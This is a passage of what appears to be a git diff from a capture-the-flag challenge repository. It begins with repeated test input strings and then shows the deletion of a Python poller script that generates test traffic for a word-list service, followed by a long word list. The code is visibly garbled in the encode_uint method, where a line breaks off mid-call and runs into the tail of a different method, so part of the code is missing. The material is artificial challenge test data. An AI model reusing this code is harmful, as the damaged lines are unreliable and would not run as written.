ello407\xffC\x26F8\x08hello408\xffC\x26F8\x08hello409\xffC\x26F8\x08hello410\xffC\x26F8\x08hello411\xffC\x26F8\x08hello412\xffC\x26F8\x08hello413\xffC\x26F8\x08hello414\xffC\x26F8\x08hello415\xffC\x26F8\x08hello416\xffC\x26F8\x08hello417\xffC\x26F8\x08hello418\xffC\x26F8\x08hello419\xffC\x26F8\x08hello420\xffC\x26F8\x08hello421\xffC\x26F8\x08hello422\xffC\x26F8\x08hello423\xffC\x26F8\x08hello424\xffC\x26F8\x08hello425\xffC\x26F8\x08hello426\xffC\x26F8\x08hello427\xffC\x26F8\x08hello428\xffC\x26F8\x08hello429\xffC\x26F8\x08hello430\xffC\x26F8\x08hello431\xffC\x26F8\x08hello432\xffC\x26F8\x08hello433\xffC\x26F8\x08hello434\xffC\x26F8\x08hello435\xffC\x26F8\x08hello436\xffC\x26F8\x08hello437\xffC\x26F8\x08hello438\xffC\x26F8\x08hello439\xffC\x26F8\x08hello440\xffC\x26F8\x08hello441\xffC\x26F8\x08hello442\xffC\x26F8\x08hello443\xffC\x26F8\x08hello444\xffC\x26F8\x08hello445\xffC\x26F8\x08hello446\xffC\x26F8\x08hello447\xffC\x26F8\x08hello448\xffC\x26F8\x08hello449\xffC\x26F8\x08hello450\xffC\x26F8\x08hello451\xffC\x26F8\x08hello452\xffC\x26F8\x08hello453\xffC\x26F8\x08hello454\xffC\x26F8\x08hello455\xffC\x26F8\x08hello456\xffC\x26F8\x08hello457\xffC\x26F8\x08hello458\xffC\x26F8\x08hello459\xffC\x26F8\x08hello460\xffC\x26F8\x08hello461\xffC\x26F8\x08hello462\xffC\x26F8\x08hello463\xffC\x26F8\x08hello464\xffC\x26F8\x08hello465\xffC\x26F8\x08hello466\xffC\x26F8\x08hello467\xffC\x26F8\x08hello468\xffC\x26F8\x08hello469\xffC\x26F8\x08hello470\xffC\x26F8\x08hello471\xffC\x26F8\x08hello472\xffC\x26F8\x08hello473\xffC\x26F8\x08hello474\xffC\x26F8\x08hello475\xffC\x26F8\x08hello476\xffC\x26F8\x08hello477\xffC\x26F8\x08hello478\xffC\x26F8\x08hello479\xffC\x26F8\x08hello480\xffC\x26F8\x08hello481\xffC\x26F8\x08hello482\xffC\x26F8\x08hello483\xffC\x26F8\x08hello484\xffC\x26F8\x08hello485\xffC\x26F8\x08hello486\xffC\x26F8\x08hello487\xffC\x26F8\x08hello488\xffC\x26F8\x08hello489\xffC\x26F8\x08hello490\xffC\x26F8\x08hello491\xffC\x26F8\x08hello492\xffC\x26F8\x08hello493\xffC\x26F8\x08hello494\xffC\x26F8\x08hello495\xffC\x26F8\x08hello496\xffC\x26F8\x08hello497\xffC\x26F8\x08hello498\xffC\x26F8\x08hello499\xffC\x26F8\x08hello500\xffC\x26F8\x08hello501\xffC\x26F8\x08hello502\xffC\x26F8\x08hello503\xffC\x26F8\x08hello504\xffC\x26F8\x08hello505\xffC\x26F8\x08hello506\xffC\x26F8\x08hello507\xffC\x26F8\x08hello508\xffC\x26F8\x08hello509\xffC\x26F8\x08hello510\xffC\x26F8\x08hello511\xffC\x26F8\x08hello512\xffC\x26F8\x08hello513\xffC\x26F8\x08hello514\xffC\x26F8\x08hello515\xffC\x26F8\x08hello516\xffC\x26F8\x08hello517\xffC\x26F8\x08hello518\xffC\x26F8\x08hello519\xffC\x26F8\x08hello520\xffC\x26F8\x08hello521\xffC\x26F8\x08hello522\xffC\x26F8\x08hello523\xffC\x26F8\x08hello524\xffC\x26F8\x08hello525\xffC\x26F8\x08hello526\xffC\x26F8\x08hello527\xffC\x26F8\x08hello528\xffC\x26F8\x08hello529\xffC\x26F8\x08hello530\xffC\x26F8\x08hello531\xffC\x26F8\x08hello532\xffC\x26F8\x08hello533\xffC\x26F8\x08hello534\xffC\x26F8\x08hello535\xffC\x26F8\x08hello536\xffC\x26F8\x08hello537\xffC\x26F8\x08hello538\xffC\x26F8\x08hello539\xffC\x26F8\x08hello540\xffC\x26F8\x08hello541\xffC\x26F8\x08hello542\xffC\x26F8\x08hello543\xffC\x26F8\x08hello544\xffC\x26F8\x08hello545\xffC\x26F8\x08hello546\xffC\x26F8\x08hello547\xffC\x26F8\x08hello548\xffC\x26F8\x08hello549\xffC\x26F8\x08hello550\xffC\x26F8\x08hello551\xffC\x26F8\x08hello552\xffC\x26F8\x08hello553\xffC\x26F8\x08hello554\xffC\x26F8\x08hello555\xffC\x26F8\x08hello556\xffC\x26F8\x08hello557\xffC\x26F8\x08hello558\xffC\x26F8\x08hello559\xffC\x26F8\x08hello560\xffC\x26F8\x08hello561\xffC\x26F8\x08hello562\xffC\x26F8\x08hello563\xffC\x26F8\x08hello564\xffC\x26F8\x08hello565\xffC\x26F8\x08hello566\xffC\x26F8\x08hello567\xffC\x26F8\x08hello568\xffC\x26F8\x08hello569\xffC\x26F8\x08hello570\xffC\x26F8\x08hello571\xffC\x26F8\x08hello572\xffC\x26F8\x08hello573\xffC\x26F8\x08hello574\xffC\x26F8\x08hello575\xffC\x26F8\x08hello576\xffC\x26F8\x08hello577\xffC\x26F8\x08hello578\xffC\x26F8\x08hello579\xffC\x26F8\x08hello580\xffC\x26F8\x08hello581\xffC\x26F8\x08hello582\xffC\x26F8\x08hello583\xffC\x26F8\x08hello584\xffC\x26F8\x08hello585\xffC\x26F8\x08hello586\xffC\x26F8\x08hello587\xffC\x26F8\x08hello588\xffC\x26F8\x08hello589\xffC\x26F8\x08hello590\xffC\x26F8\x08hello591\xffC\x26F8\x08hello592\xffC\x26F8\x08hello593\xffC\x26F8\x08hello594\xffC\x26F8\x08hello595\xffC\x26F8\x08hello596\xffC\x26F8\x08hello597\xffC\x26F8\x08hello598\xffC\x26F8\x08hello599\xffC\x26F8\x08hello600\xffC\x26F8\x08hello601\xffC\x26F8\x08hello602\xffC\x26F8\x08hello603\xffC\x26F8\x08hello604\xffC\x26F8\x08hello605\xffC\x26F8\x08hello606\xffC\x26F8\x08hello607\xffC\x26F8\x08hello608\xffC\x26F8\x08hello609\xffC\x26F8\x08hello610\xffC\x26F8\x08hello611\xffC\x26F8\x08hello612\xffC\x26F8\x08hello613\xffC\x26F8\x08hello614\xffC\x26F8\x08hello615\xffC\x26F8\x08hello616\xffC\x26F8\x08hello617\xffC\x26F8\x08hello618\xffC\x26F8\x08hello619\xffC\x26F8\x08hello620\xffC\x26F8\x08hello621\xffC\x26F8\x08hello622\xffC\x26F8\x08hello623\xffC\x26F8\x08hello624\xffC\x26F8\x08hello625\xffC\x26F8\x08hello626\xffC\x26F8\x08hello627\xffC\x26F8\x08hello628\xffC\x26F8\x08hello629\xffC\x26F8\x08hello630\xffC\x26F8\x08hello631\xffC\x26F8\x08hello632\xffC\x26F8\x08hello633\xffC\x26F8\x08hello634\xffC\x26F8\x08hello635\xffC\x26F8\x08hello636\xffC\x26F8\x08hello637\xffC\x26F8\x08hello638\xffC\x26F8\x08hello639\xffC\x26F8\x08hello640\xffC\x26F8\x08hello641\xffC\x26F8\x08hello642\xffC\x26F8\x08hello643\xffC\x26F8\x08hello644\xffC\x26F8\x08hello645\xffC\x26F8\x08hello646\xffC\x26F8\x08hello647\xffC\x26F8\x08hello648\xffC\x26F8\x08hello649\xffC\x26F8\x08hello650\xffC\x26F8\x08hello651\xffC\x26F8\x08hello652\xffC\x26F8\x08hello653\xffC\x26F8\x08hello654\xffC\x26F8\x08hello655\xffC\x26F8\x08hello656\xffC\x26F8\x08hello657\xffC\x26F8\x08hello658\xffC\x26F8\x08hello659\xffC\x26F8\x08hello660\xffC\x26F8\x08hello661\xffC\x26F8\x08hello662\xffC\x26F8\x08hello663\xffC\x26F8\x08hello664\xffC\x26F8\x08hello665\xffC\x26F8\x08hello666\xffC\x26F8\x08hello667\xffC\x26F8\x08hello668\xffC\x26F8\x08hello669\xffC\x26F8\x08hello670\xffC\x26F8\x08hello671\xffC\x26F8\x08hello672\xffC\x26F8\x08hello673\xffC\x26F8\x08hello674\xffC\x26F8\x08hello675\xffC\x26F8\x08hello676\xffC\x26F8\x08hello677\xffC\x26F8\x08hello678\xffC\x26F8\x08hello679\xffC\x26F8\x08hello680\xffC\x26F8\x08hello681\xffC\x26F8\x08hello682\xffC\x26F8\x08hello683\xffC\x26F8\x08hello684\xffC\x26F8\x08hello685\xffC\x26F8\x08hello686\xffC\x26F8\x08hello687\xffC\x26F8\x08hello688\xffC\x26F8\x08hello689\xffC\x26F8\x08hello690\xffC\x26F8\x08hello691\xffC\x26F8\x08hello692\xffC\x26F8\x08hello693\xffC\x26F8\x08hello694\xffC\x26F8\x08hello695\xffC\x26F8\x08hello696\xffC\x26F8\x08hello697\xffC\x26F8\x08hello698\xffC\x26F8\x08hello699\xffC\x26F8\x08hello700\xffC\x26F8\x08hello701\xffC\x26F8\x08hello702\xffC\x26F8\x08hello703\xffC\x26F8\x08hello704\xffC\x26F8\x08hello705\xffC\x26F8\x08hello706\xffC\x26F8\x08hello707\xffC\x26F8\x08hello708\xffC\x26F8\x08hello709\xffC\x26F8\x08hello710\xffC\x26F8\x08hello711\xffC\x26F8\x08hello712\xffC\x26F8\x08hello713\xffC\x26F8\x08hello714\xffC\x26F8\x08hello715\xffC\x26F8\x08hello716\xffC\x26F8\x08hello717\xffC\x26F8\x08hello718\xffC\x26F8\x08hello719\xffC\x26F8\x08hello720\xffC\x26F8\x08hello721\xffC\x26F8\x08hello722\xffC\x26F8\x08hello723\xffC\x26F8\x08hello724\xffC\x26F8\x08hello725\xffC\x26F8\x08hello726\xffC\x26F8\x08hello727\xffC\x26F8\x08hello728\xffC\x26F8\x08hello729\xffC\x26F8\x08hello730\xffC\x26F8\x08hello731\xffC\x26F8\x08hello732\xffC\x26F8\x08hello733\xffC\x26F8\x08hello734\xffC\x26F8\x08hello735\xffC\x26F8\x08hello736\xffC\x26F8\x08hello737\xffC\x26F8\x08hello738\xffC\x26F8\x08hello739\xffC\x26F8\x08hello740\xffC\x26F8\x08hello741\xffC\x26F8\x08hello742\xffC\x26F8\x08hello743\xffC\x26F8\x08hello744\xffC\x26F8\x08hello745\xffC\x26F8\x08hello746\xffC\x26F8\x08hello747\xffC\x26F8\x08hello748\xffC\x26F8\x08hello749\xffC\x26F8\x08hello750\xffC\x26F8\x08hello751\xffC\x26F8\x08hello752\xffC\x26F8\x08hello753\xffC\x26F8\x08hello754\xffC\x26F8\x08hello755\xffC\x26F8\x08hello756\xffC\x26F8\x08hello757\xffC\x26F8\x08hello758\xffC\x26F8\x08hello759\xffC\x26F8\x08hello760\xffC\x26F8\x08hello761\xffC\x26F8\x08hello762\xffC\x26F8\x08hello763\xffC\x26F8\x08hello764\xffC\x26F8\x08hello765\xffC\x26F8\x08hello766\xffC\x26F8\x08hello767\xffC\x26F8\x08hello768\xffC\x26F8\x08hello769\xffC\x26F8\x08hello770\xffC\x26F8\x08hello771\xffC\x26F8\x08hello772\xffC\x26F8\x08hello773\xffC\x26F8\x08hello774\xffC\x26F8\x08hello775\xffC\x26F8\x08hello776\xffC\x26F8\x08hello777\xffC\x26F8\x08hello778\xffC\x26F8\x08hello779\xffC\x26F8\x08hello780\xffC\x26F8\x08hello781\xffC\x26F8\x08hello782\xffC\x26F8\x08hello783\xffC\x26F8\x08hello784\xffC\x26F8\x08hello785\xffC\x26F8\x08hello786\xffC\x26F8\x08hello787\xffC\x26F8\x08hello788\xffC\x26F8\x08hello789\xffC\x26F8\x08hello790\xffC\x26F8\x08hello791\xffC\x26F8\x08hello792\xffC\x26F8\x08hello793\xffC\x26F8\x08hello794\xffC\x26F8\x08hello795\xffC\x26F8\x08hello796\xffC\x26F8\x08hello797\xffC\x26F8\x08hello798\xffC\x26F8\x08hello799\xffC\x26F8\x08hello800 - -800[\x00\x01]* - - diff --git a/challenges/FUN/poller/for-testing/machine.py b/challenges/FUN/poller/for-testing/machine.py deleted file mode 100644 index bbfe60f01..000000000 --- a/challenges/FUN/poller/for-testing/machine.py +++ /dev/null @@ -1,11853 +0,0 @@ -from generator.actions import Actions -import random -import re -import string -import struct - -def random_alnum(size): - return ''.join([random.choice(string.ascii_letters + string.digits) for x in xrange(size)]) - -class Fun(Actions): - def encode_uint(self, v): - if v < 0x80: - return chr(v) - elif v < 0x7f00: - return struct.pack('>H', v | 0x8000) - else: - return struct.pack(' 31: - self.write(self.encode_uint(len(s))) - return False - else: - self.write(self.encode_uint(len(s)) + s) - return True - - def recv_string(self, s): - s = self.encode_uint(len(s)) + s - self.read(length=len(s), expect=s) - - def menu1(self): - pass - - def menu2(self): - pass - - def start(self): - self.state['words'] = list(words) - - def end(self): - self.send_uint(0) - self.recv_uint(0) - - def do_reprotect1(self): - self.send_uint(0x35897932) - self.send_uint(random.randint(0, 0xFFFFFFFF)) - self.recv_uint(0) - - def do_reprotect2(self): - self.do_reprotect1() - - def do_add_word1(self): - self.send_uint(0x38462643) - word = random.choice(self.state['words']) + '_' + random_alnum(5) - if self.send_string(word) and len(word) >= 9: - self.recv_uint(0) - self.state['words'].append(word) - else: - self.recv_uint(1) - - def do_add_word2(self): - self.do_add_word1() - - def do_search1(self): - partial = self.chance(0.5) - if partial: - self.send_uint(0x69399376) - else: - self.send_uint(0x69399375) - i = random.randint(0, len(self.state['words']) - 1) - self.send_string(self.state['words'][i]) - self.recv_uint(0) - if not partial: - self.recv_uint(i) - else: - for x in xrange(len(self.state['words'])): - if self.state['words'][x].startswith(self.state['words'][i]): - self.recv_uint(x) - break - - def do_search2(self): - self.do_search1() - - def do_generate1(self): - self.send_uint(0x2884) - self.recv_uint(0) - self.send_uint(0x35897932) - self.send_uint(random.randint(0, 0xffffffff)) - self.read(delim='\0') - - def do_generate2(self): - self.do_generate1() - - def do_training1(self): - self.send_uint(0x1971) - self.recv_uint(0) - self.send_uint(0 if self.chance(0.5) else 1) - self.read(delim='\0') - - def do_training2(self): - self.do_training1() - - def do_sort(self): - reverse = self.chance(0.5) - self.send_uint(0x38327950) - self.send_uint(1 if reverse else 0) - self.recv_uint(0) - self.state['words'] = list(sorted(self.state['words'], reverse=reverse)) - -words = [ - "lighthearted", - "housebroken", - "crown princess", - "include", - "countenance", - "boozer", - "carve", - "cheesecloth", - "fanciful", - "butterfingers", - "ambitious", - "he'd", - "gutsy", - "local", - "fluidity", - "low-paid", - "fallacious", - "chilly", - "dirty", - "cutlery", - "empress", - "bigot", - "gulch", - "incessantly", - "exhaust", - "lotion", - "carnivore", - "bigamy", - "emerge", - "bikini", - "excitement", - "lose", - "Episcopal Church", - "fool", - "ambush", - "fare", - "fractionally", - "ethereal", - "gesticulate", - "epaulet", - "communicable", - "continuity", - "inoculation", - "excrete", - "contradictory", - "assignment", - "ecological", - "inflict", - "loyal", - "free will", - "educational", - "faculty", - "business administration", - "Europe", - "hang", - "lily", - "foliage", - "humanize", - "brief", - "grand piano", - "computation", - "camellia", - "disapprovingly", - "heartbreaking", - "litigation", - "algebra", - "C-section", - "ABC", - "heyday", - "grin", - "bedpan", - "fog", - "akin", - "long-range", - "at", - "clutches", - "delay", - "hen", - "godforsaken", - "disclose", - "backlash", - "duffel bag", - "biting", - "elevation", - "discord", - "gnat", - "effort", - "hot seat", - "creditable", - "croon", - "equator", - "dilute", - "duplicate", - "funeral director", - "apartheid", - "family values", - "abashed", - "footage", - "lost", - "detain", - "journalism", - "Caucasian", - "blot", - "hangers-on", - "intelligible", - "looter", - "arraignment", - "easygoing", - "aerodynamic", - "doesn't", - "guy", - "flub", - "dismissal", - "lucidity", - "informed", - "forgery", - "indifferently", - "hot tub", - "marinade", - "inequity", - "indelibly", - "limousine", - "imaginable", - "chicken pox", - "acquisition", - "delayed", - "hijacker", - "edible", - "expenses", - "he", - "dolly", - "big cheese", - "developing", - "glare", - "dissolve", - "forfeit", - "christening", - "avarice", - "devious", - "forte", - "forward-looking", - "abhorrent", - "alleviate", - "hairy", - "distinction", - "franc", - "convoluted", - "four-letter word", - "mallet", - "anatomy", - "arsenal", - "class", - "courageously", - "exit", - "laundry room", - "kid", - "associate professor", - "guzzler", - "jest", - "first aid", - "irritation", - "inconspicuous", - "avalanche", - "Democrat", - "cornerstone", - "heel", - "infertile", - "in-house", - "inhospitable", - "count", - "extremity", - "consume", - "hoe", - "insect", - "disdain", - "Antarctic", - "hospitalization", - "glasses", - "combine", - "judiciary", - "carelessness", - "jubilant", - "brash", - "classic", - "crucifixion", - "impossibility", - "call", - "covertly", - "flying", - "chip", - "agonizingly", - "albeit", - "beside", - "die", - "homework", - "intestine", - "curve", - "aside", - "bonfire", - "Inc.", - "geometrically", - "construct", - "justify", - "generation gap", - "currency", - "imitation", - "frustrated", - "horoscope", - "distinctively", - "anyway", - "am", - "abominable", - "imperialism", - "discouraged", - "concrete", - "counselor", - "arise", - "creole", - "desecrate", - "essential", - "darken", - "field day", - "confine", - "blowtorch", - "forlorn", - "full-time", - "craft", - "Dumpster", - "ingratitude", - "fatality", - "imperial", - "exclusively", - "blank check", - "elementary school", - "Antarctica", - "arm", - "convey", - "appearance", - "gerrymandering", - "frankness", - "heavens", - "French bread", - "Achilles' heel", - "frizz", - "mammal", - "Black", - "heave", - "deportation", - "gestation", - "guaranty", - "assertiveness", - "flowerbed", - "headlines", - "headhunter", - "inflationary", - "bulletproof", - "learn", - "foreclose", - "joyriding", - "colorful", - "dreadfully", - "adequately", - "assembly line", - "insistently", - "cover", - "dilemma", - "dawn", - "battered", - "land mine", - "junk", - "glandular", - "flour", - "intermarriage", - "donate", - "almost", - "loft", - "life preserver", - "decrease", - "inscribe", - "leek", - "ambassador", - "dismally", - "fossil fuel", - "fingerprint", - "choice", - "gonna", - "fart", - "funnel cloud", - "large-scale", - "favoritism", - "hale", - "diseased", - "inaccurate", - "crate", - "bird", - "athlete", - "evade", - "gelding", - "atheist", - "handbook", - "hangover", - "affectionately", - "mar", - "killing", - "cavalry", - "ago", - "manslaughter", - "lottery", - "accreditation", - "cloth", - "bylaw", - "disclaim", - "budding", - "croak", - "hernia", - "audacity", - "avoid", - "circumstance", - "fetch", - "magician", - "dump truck", - "consolation", - "genital", - "foreground", - "cleanse", - "displace", - "host", - "catnip", - "knuckle", - "grad school", - "briny", - "curt", - "affectation", - "madness", - "incorporated", - "bumper sticker", - "electrician", - "expose", - "astutely", - "believable", - "cultural", - "lubrication", - "imbue", - "ink", - "humdrum", - "lunatic", - "keenness", - "depressed", - "injurious", - "bored", - "calibrate", - "hark", - "aimlessly", - "leapt", - "elicit", - "convoy", - "kowtow", - "Jew", - "impale", - "axle", - "derision", - "icing", - "accord", - "expressway", - "homeroom", - "hit-and-run", - "chiffon", - "halibut", - "eyebrow", - "entirely", - "habitual", - "girder", - "immune system", - "competitor", - "inherent", - "diction", - "acclaimed", - "context", - "curable", - "high roller", - "capital letter", - "alcohol", - "government", - "luxuriate", - "canvass", - "death penalty", - "hanger-on", - "corpulent", - "ace", - "cherish", - "inconclusive", - "decoration", - "hatchet", - "appallingly", - "cheapskate", - "aboard", - "defamation", - "indicator", - "amid", - "inexpensively", - "footwork", - "gristle", - "drive", - "elopement", - "justifiably", - "furl", - "blizzard", - "illegible", - "gentle", - "booze", - "kung fu", - "endow", - "aid", - "epic", - "furor", - "dole", - "diagnostic", - "insulate", - "drinking", - "involve", - "baby boom", - "buffoon", - "cinnamon", - "college", - "broad-minded", - "exhilarating", - "estimated", - "levitation", - "Deep South", - "conditionally", - "crisply", - "char", - "equine", - "frivolously", - "hash browns", - "ID card", - "jig", - "intentional", - "biscuit", - "credible", - "laborious", - "explanatory", - "dawdle", - "disclosure", - "long johns", - "cottonwood", - "clear", - "carrier", - "cobblestone", - "halftime", - "chide", - "incisive", - "lob", - "freeload", - "electrode", - "brag", - "dangerously", - "flagstone", - "announce", - "capriciously", - "hookey", - "crackdown", - "combatant", - "grand total", - "congratulatory", - "faultless", - "burglary", - "humbly", - "fluoride", - "inland", - "affect", - "embryo", - "h'm", - "fireplace", - "constipation", - "dew", - "likable", - "electoral", - "credit", - "downplay", - "Mars", - "coagulation", - "airliner", - "gloat", - "comeuppance", - "cast-iron", - "admonish", - "highlighter", - "carpeted", - "doomed", - "grayish", - "accommodation", - "affirmatively", - "cobweb", - "exhaustively", - "contention", - "infliction", - "apparition", - "lonesome", - "anguish", - "coward", - "chairwoman", - "bologna", - "customarily", - "enchanting", - "maid of honor", - "jaw", - "improperly", - "entrance ramp", - "handlebar", - "authorization", - "beginner", - "groupie", - "inflexibly", - "exploratory", - "gleaming", - "flash flood", - "depend", - "gruffly", - "guileless", - "glisten", - "competence", - "hyperactive", - "enjoyable", - "garish", - "collaborate", - "amazingly", - "absent-minded", - "elude", - "electric", - "drawing", - "childproof", - "buff", - "abbreviation", - "astringent", - "alkali", - "adoption", - "bestial", - "hatchback", - "allay", - "credibility", - "foretaste", - "exceptionally", - "aesthetics", - "dehydration", - "company", - "guzzle", - "deacon", - "inefficiently", - "majorly", - "compulsive", - "brokerage", - "chin", - "Good Friday", - "correlate", - "abacus", - "bore", - "categorically", - "fez", - "actuality", - "cirrhosis", - "compelling", - "gauche", - "debt", - "lumbering", - "adjournment", - "engender", - "blatant", - "hard currency", - "marketable", - "disbelief", - "home", - "delicious", - "godmother", - "confidential", - "bead", - "advent", - "macrocosm", - "howdy", - "incorporate", - "landlady", - "knotty", - "devoutly", - "beautifully", - "cervical", - "contrast", - "frail", - "Down's syndrome", - "behalf", - "attentively", - "coworker", - "cherub", - "disfigure", - "fix", - "hesitate", - "fax", - "indecency", - "foyer", - "emphatic", - "cadaver", - "chipmunk", - "fathom", - "freshwater", - "h", - "balm", - "internship", - "attainable", - "fluctuate", - "are", - "downright", - "gullibility", - "inkling", - "cooperation", - "bachelor", - "fourthly", - "hankie", - "indictment", - "lover", - "gradient", - "hitch", - "gassy", - "computer", - "broke", - "fortune", - "brighten", - "gaseous", - "crook", - "health food", - "languorous", - "hound", - "disproportionately", - "humanist", - "homeowner", - "burning", - "gasket", - "deign", - "brothel", - "leggy", - "jockey", - "ambivalent", - "juncture", - "embezzle", - "jack-in-the-box", - "ankle", - "clef", - "kindhearted", - "aura", - "floodgate", - "coercive", - "arose", - "flicker", - "influential", - "limb", - "common sense", - "callus", - "certified check", - "crooked", - "decree", - "irresistible", - "gangrene", - "anytime", - "deserve", - "instructive", - "drunkenness", - "humanely", - "far-out", - "expendable", - "cheerfully", - "kettle", - "clot", - "federate", - "borne", - "approve", - "accusing", - "accommodate", - "borrow", - "daylight", - "explore", - "cure", - "letterhead", - "license", - "exonerate", - "crew cut", - "coincide", - "cheapness", - "browbeat", - "adjustable", - "ingeniously", - "ice cream", - "lax", - "endurance", - "dispirited", - "boo", - "joke", - "frieze", - "E", - "chef", - "evolutionary", - "admiration", - "dear", - "manure", - "effectively", - "dismount", - "hypodermic", - "impolite", - "equality", - "manufacturer", - "Congress", - "cease-fire", - "divided highway", - "candor", - "cognac", - "arrive", - "itinerary", - "food", - "attractiveness", - "inflated", - "hither", - "attorney general", - "indiscriminate", - "contractor", - "exuberant", - "disrespectful", - "flashback", - "arrogance", - "eaves", - "grating", - "folder", - "attribute", - "cattle", - "invincible", - "distract", - "hotel", - "digress", - "dissolute", - "lens", - "flora", - "hopelessness", - "crafty", - "assist", - "gnarled", - "district attorney", - "citrus", - "cholera", - "bubble", - "engraving", - "lieutenant", - "fuse", - "contempt", - "five", - "creek", - "glade", - "improvisation", - "core", - "histrionic", - "bummer", - "civilian", - "acute angle", - "leaflet", - "disruptive", - "ghoul", - "eyesight", - "civil liberties", - "deftly", - "adulterate", - "cola", - "instinctive", - "grammatically", - "kitten", - "grandchild", - "ardent", - "communication", - "limo", - "calendar", - "fizzy", - "clitoris", - "fiddle", - "euthanasia", - "daring", - "itchiness", - "manifold", - "inexperience", - "anxious", - "fraud", - "daughter", - "depraved", - "lake", - "Capitol", - "emperor", - "bed", - "injunction", - "acceleration", - "driving", - "concede", - "haircut", - "deport", - "grid", - "extortion", - "leggings", - "eye-catching", - "freight", - "erupt", - "bogged down", - "broken-down", - "aisle", - "favorably", - "beaker", - "dish", - "confirmation", - "inflammable", - "edge", - "froth", - "drunkard", - "knitting needle", - "entrance", - "forethought", - "clay", - "excruciatingly", - "governor", - "hesitant", - "Earth", - "dossier", - "idol", - "chew", - "leg", - "despondent", - "attach", - "jog", - "Apr.", - "corrode", - "crowning", - "international", - "desegregate", - "holder", - "brigade", - "hairnet", - "Big Apple", - "disorientation", - "ladybug", - "'cause", - "element", - "distinctly", - "cinch", - "catwalk", - "exclusive", - "extraterrestrial", - "Easter egg", - "green", - "cashmere", - "boredom", - "finicky", - "authority", - "deceptively", - "magnification", - "dutiful", - "impervious", - "amber", - "corruptible", - "deadpan", - "indecision", - "clink", - "manicure", - "domesticate", - "handicap", - "deafen", - "flip", - "formality", - "acrimony", - "authoritarian", - "figurehead", - "diabolical", - "digression", - "deformation", - "crept", - "capital", - "FYI", - "civilized", - "infrastructure", - "disheveled", - "devotedly", - "elastic", - "foreign", - "kick", - "curator", - "barrier", - "accumulation", - "abstract", - "grapevine", - "bulldog", - "close-knit", - "in-between", - "facetious", - "chow", - "cheesecake", - "doughnut", - "backlog", - "joy", - "bilingual", - "backdrop", - "forever", - "effervescent", - "clinically", - "horseplay", - "generosity", - "hall", - "dangle", - "cleric", - "floor", - "expedite", - "debilitate", - "bold", - "farsighted", - "commuter", - "flannel", - "adopt", - "asexual", - "embankment", - "appendicitis", - "insides", - "gurgling", - "angelically", - "anticipation", - "kW", - "eventuality", - "liaison", - "dab", - "liquid", - "hanky-panky", - "dependency", - "crossing", - "linger", - "cram", - "algorithm", - "jeans", - "handshake", - "Boy Scout", - "fulfillment", - "chalk", - "barricade", - "inflammation", - "frugality", - "incomplete", - "catching", - "functional", - "drawback", - "fragile", - "evaporation", - "debase", - "growl", - "gynecology", - "aerial", - "harmoniously", - "holiness", - "billfold", - "efficient", - "intermission", - "inwards", - "interest", - "high-strung", - "laden", - "grouse", - "interwove", - "legislative", - "czar", - "firm", - "contour", - "creature", - "counter", - "indolence", - "gaggle", - "inferno", - "libel", - "exterior", - "frat", - "full", - "bet", - "conservatism", - "hate crime", - "diaper", - "demanding", - "dupe", - "enrollment", - "designing", - "fibrous", - "cagey", - "hawk", - "gait", - "duke", - "detailed", - "dollop", - "convince", - "inning", - "introvert", - "former", - "cross section", - "liquor", - "guacamole", - "erase", - "mammoth", - "fish", - "ironing", - "deliver", - "impulsiveness", - "birthrate", - "erect", - "hung", - "finely", - "data processing", - "eardrum", - "internationally", - "confetti", - "babble", - "camel", - "interestingly", - "car wash", - "blob", - "devise", - "accustomed", - "exhilaration", - "biochemistry", - "debate", - "marionette", - "laurel", - "gangplank", - "diminutive", - "lucrative", - "listless", - "famous", - "convinced", - "haven't", - "guts", - "mandarin orange", - "big-league", - "defensible", - "duo", - "commerce", - "lesser", - "climb", - "chap", - "impair", - "accumulate", - "chipper", - "certification", - "collusion", - "freshman", - "delicacy", - "energies", - "lizard", - "astonished", - "debasement", - "fidget", - "income tax", - "echo", - "fishbowl", - "approachable", - "cookie", - "key ring", - "cackle", - "attorney", - "cash cow", - "accrue", - "different", - "everyplace", - "dwarves", - "crib sheet", - "learning", - "hyphenation", - "condition", - "dork", - "cabaret", - "fragility", - "Jul.", - "crystallization", - "grab", - "furrow", - "fast lane", - "bidder", - "Father's Day", - "impossibly", - "disgusting", - "basket", - "gripping", - "furnishings", - "broker", - "atomic bomb", - "go-ahead", - "buck", - "confederate", - "elation", - "imminently", - "filament", - "degree", - "bolster", - "clobber", - "articulately", - "gene", - "inconsequential", - "electron", - "destroy", - "demented", - "businesslike", - "flirtation", - "jointly", - "hole", - "diamond", - "indict", - "lie detector", - "answer", - "feast", - "experimental", - "love seat", - "conscious", - "goulash", - "consulate", - "butterscotch", - "dispassionate", - "duplication", - "dread", - "equinox", - "hydrogen", - "lazy", - "galoshes", - "fictitious", - "guess", - "lineup", - "booby-trap", - "improve", - "laxity", - "Hall of Fame", - "gawk", - "ferocious", - "courts-martial", - "breeder", - "countable", - "gal", - "cutlet", - "graze", - "gallivant", - "form letter", - "analogy", - "lush", - "elemental", - "derivation", - "exemplary", - "demolish", - "abscess", - "kilobyte", - "beeline", - "grimy", - "cleverness", - "illegibly", - "hike", - "magpie", - "indolent", - "farthest", - "bourbon", - "bosom", - "ingratiating", - "love story", - "contents", - "explicit", - "font", - "flea market", - "jagged", - "emirate", - "flaunt", - "adage", - "invoke", - "fallible", - "burn", - "bulb", - "indiscriminately", - "godchild", - "inspector", - "annotated", - "ejaculation", - "effect", - "behold", - "genealogist", - "importantly", - "insertion", - "asterisk", - "breadbasket", - "ancestry", - "balanced", - "horrible", - "file", - "cutback", - "gusty", - "first-degree", - "irreconcilable", - "avant-garde", - "I've", - "consort", - "institutional", - "blooper", - "intently", - "fishing rod", - "dweller", - "elliptical", - "ditto", - "gallant", - "Irish", - "exacerbate", - "bullfighting", - "location", - "implicitly", - "dazzle", - "English", - "incident", - "enlist", - "irritate", - "cataclysmic", - "hair dryer", - "curricula", - "clueless", - "horrifying", - "gyration", - "diver", - "insurance", - "longitude", - "casket", - "curly", - "genitals", - "knives", - "circuitous", - "Mar.", - "godchildren", - "bigoted", - "drab", - "informally", - "bulge", - "compromise", - "keeping", - "greet", - "crumble", - "allegedly", - "inspiring", - "buoyant", - "bellow", - "commercially", - "indulgent", - "bookie", - "humiliated", - "chauffeur", - "divorce", - "cycle", - "alibi", - "degenerate", - "corpse", - "dressmaker", - "abet", - "economy", - "dues", - "loyalty", - "grade school", - "crosstown", - "combative", - "city", - "atonement", - "gunfire", - "breakthrough", - "dresser", - "jet propulsion", - "delighted", - "business card", - "diversify", - "cinematographer", - "incompletely", - "bouncer", - "confidence", - "fermented", - "estimation", - "freshly", - "inmate", - "fortitude", - "departmental", - "exponent", - "coat", - "fauna", - 